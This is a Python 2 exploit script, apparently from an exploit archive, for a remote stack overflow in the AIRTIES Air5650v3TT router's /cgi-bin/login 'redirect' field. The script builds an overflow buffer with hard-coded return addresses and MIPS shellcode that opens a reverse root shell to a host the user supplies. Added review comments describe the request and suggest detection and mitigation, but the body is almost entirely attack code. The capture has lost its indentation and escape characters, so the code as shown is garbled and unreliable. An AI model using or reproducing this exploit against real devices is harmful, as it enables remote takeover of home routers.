
Airties Air5650v3TT Remote Stack Overflow

2015-04-04 05:30

#!/usr/bin/env python
#####################################################################################
# Exploit for the AIRTIES Air5650v3TT
# Spawns a reverse root shell
# Author: Batuhan Burakcin
# Contact: [email protected]
# Twitter: @batuhanburakcin
# Web: http://www.bmicrosystems.com
#####################################################################################

import sys
import time
import string
import socket, struct
import urllib, urllib2, httplib





# NOTE(review): this listing is a lossy web capture -- block indentation and the
# escape characters inside the byte strings were stripped -- so read it as a
# description of the malicious request, not as runnable code.
#
# What the visible code does: it takes a device address plus a callback
# host/port from the command line, builds one oversized value, and sends it as
# the `redirect` form field of a single HTTP POST to /cgi-bin/login.
if __name__ == '__main__':




# Positional arguments: device address, callback host, callback port.
# The bare except only prints the usage line; nothing here stops execution
# afterwards.
try:
ip = sys.argv[1]
revhost = sys.argv[2]
revport = sys.argv[3]
except:
print "Usage: %s <target ip> <reverse shell ip> <reverse shell port>" % sys.argv[0]

# Callback address as a 32-bit big-endian integer and the port as an int;
# both are spliced into the payload below.
host = struct.unpack('>L',socket.inet_aton(revhost))[0]
port = string.atoi(revport)


# Opaque machine-code payload (a reverse root shell, according to the file
# header). The callback port and host are packed big-endian and inserted as
# 16-bit halves. Defender view: a successful hit would presumably show up as
# the device itself opening an outbound TCP connection to an unexpected host,
# so egress monitoring/filtering for CPE management planes is relevant here.
shellcode = ""
shellcode += "x24x0fxffxfax01xe0x78x27x21xe4xffxfdx21xe5xffxfd"
shellcode += "x28x06xffxffx24x02x10x57x01x01x01x0cxafxa2xffxff"
shellcode += "x8fxa4xffxffx34x0fxffxfdx01xe0x78x27xafxafxffxe0"
shellcode += "x3cx0e" + struct.unpack('>cc',struct.pack('>H', port))[0] +
struct.unpack('>cc',struct.pack('>H', port))[1]
shellcode += "x35xce" + struct.unpack('>cc',struct.pack('>H', port))[0] +
struct.unpack('>cc',struct.pack('>H', port))[1]
shellcode += "xafxaexffxe4"
shellcode += "x3cx0e" + struct.unpack('>cccc',struct.pack('>I', host))[0] +
struct.unpack('>cccc',struct.pack('>I', host))[1]
shellcode += "x35xce" + struct.unpack('>cccc',struct.pack('>I', host))[2] +
struct.unpack('>cccc',struct.pack('>I', host))[3]
shellcode += "xafxaexffxe6x27xa5xffxe2x24x0cxffxefx01x80x30x27"
shellcode += "x24x02x10x4ax01x01x01x0cx24x11xffxfdx02x20x88x27"
shellcode += "x8fxa4xffxffx02x20x28x21x24x02x0fxdfx01x01x01x0c"
shellcode += "x24x10xffxffx22x31xffxffx16x30xffxfax28x06xffxff"
shellcode += "x3cx0fx2fx2fx35xefx62x69xafxafxffxecx3cx0ex6ex2f"
shellcode += "x35xcex73x68xafxaexffxf0xafxa0xffxf4x27xa4xffxec"
shellcode += "xafxa4xffxf8xafxa0xffxfcx27xa5xffxf8x24x02x0fxab"
shellcode += "x01x01x01x0c"


# Overflow buffer: runs of filler interleaved with five hard-coded 4-byte
# values, then the payload, then a 4-byte pattern repeated 48 times.
# The hard-coded values are presumably code addresses on the device, which
# would mean the firmware's memory layout is predictable -- TODO confirm
# against the vendor advisory.
# The intended value is on the order of a kilobyte before URL-encoding, far
# longer than any legitimate redirect target.
data = "x41"*359 + "x2AxB1x19x18" + "x41"*40 + "x2AxB1x44x40"
data += "x41"*12 + "x2AxB0xFCxD4" + "x41"*16 + "x2AxB0x7Ax2C"
data += "x41"*28 + "x2AxB0x30xDC" + "x41"*240 + shellcode +
"x27xE0xFFxFF"*48

# Form fields for the login CGI; only `redirect` carries the oversized value.
# The user/password values look like throwaway placeholders, which suggests
# the vulnerable handling of `redirect` happens before any credential check
# -- verify against the vendor advisory.
# Detection idea: alert on POSTs to /cgi-bin/login whose `redirect` field is
# longer than a short URL or contains non-printable bytes.
# Mitigation: keep the device's web management interface unreachable from
# untrusted networks and apply the vendor's firmware fix where one exists.
pdata = {
'redirect' : data,
'self' : '1',
'user' : 'tanri',
'password' : 'ihtiyacmyok',
'gonder' : 'TAMAM'
}

login_data = urllib.urlencode(pdata)
#print login_data

# Plain-HTTP request with no extra headers; urllib2 issues a POST because a
# body is supplied. The response object is stored in rsp and never inspected.
url = 'http://%s/cgi-bin/login' % ip
header = {}
req = urllib2.Request(url, login_data, header)
rsp = urllib2.urlopen(req)


Source: 6200405102-BLW/eussi/moc.ytirucesxc
